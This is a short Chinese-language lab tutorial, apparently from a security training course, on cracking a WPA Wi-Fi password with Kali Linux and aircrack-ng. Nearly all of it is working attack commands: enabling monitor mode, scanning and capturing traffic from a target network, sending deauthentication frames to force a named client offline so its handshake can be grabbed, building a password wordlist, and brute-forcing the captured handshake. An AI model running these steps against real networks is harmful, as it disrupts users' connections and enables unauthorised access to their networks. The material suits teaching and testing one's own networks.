硬件准备
-
需要购买无线网卡(2.4GHz/5GHz):
- 可以接入kali
- 推荐买免驱款
实验步骤
- 插入无线网卡,接入kali系统
- 查看无线网卡信息
iwconfig
- 开启无线网卡,启动监听模式
airmon-ng start 无线网卡名词
- 确认无线网卡状态
- 开启扫描,扫描网络中可以WIFI
airodump-ng 无线网卡名词airodump-ng wlan0mon
- 扫描指定WIFI
airodump-ng -w 文件存储路径 -c 目标信道 --bssid 目标WIFI设备MAC 无线网卡名词airodump-ng -w /woniuxy -c 11 --bssid F4:6D:2F:45:73:62 wlan0mon
- 强制踢用户下线,迫使用户重新登录,趁机抓取握手报文
aireplay-ng -0 次数 -c 目标客户端设备MAC -a 目标WIFI设备MAC 网卡名称aireplay-ng -0 10 -c 72:CE:23:DF:B7:E9 -a F4:6D:2F:45:73:62 wlan0mon
- 查看并解压kali自带数据字典
#查看rockyou.txt.gzls /usr/share/wordlists#解压gzip -d /usr/share/wordlists/rockyou.txt.gz
- 创建数据字典
echo 123456 >> /pw.txtecho 654321 >> /pw.txtecho ad123 >> /pw.txtecho admin >> /pw.txtecho p-0p-0p-0 >> /pw.txtecho woniu >> /pw.txtecho woniu123 >> /pw.txtecho Woniuxy >> /pw.txtecho Woniuxy123 >> /pw.txtecho w123456 >> /pw.txt
- 爆破
aircrack-ng -w 数据字典路径 抓到的登录握手数据包.capaircrack-ng -w /pw.txt /woniuxy-01.cap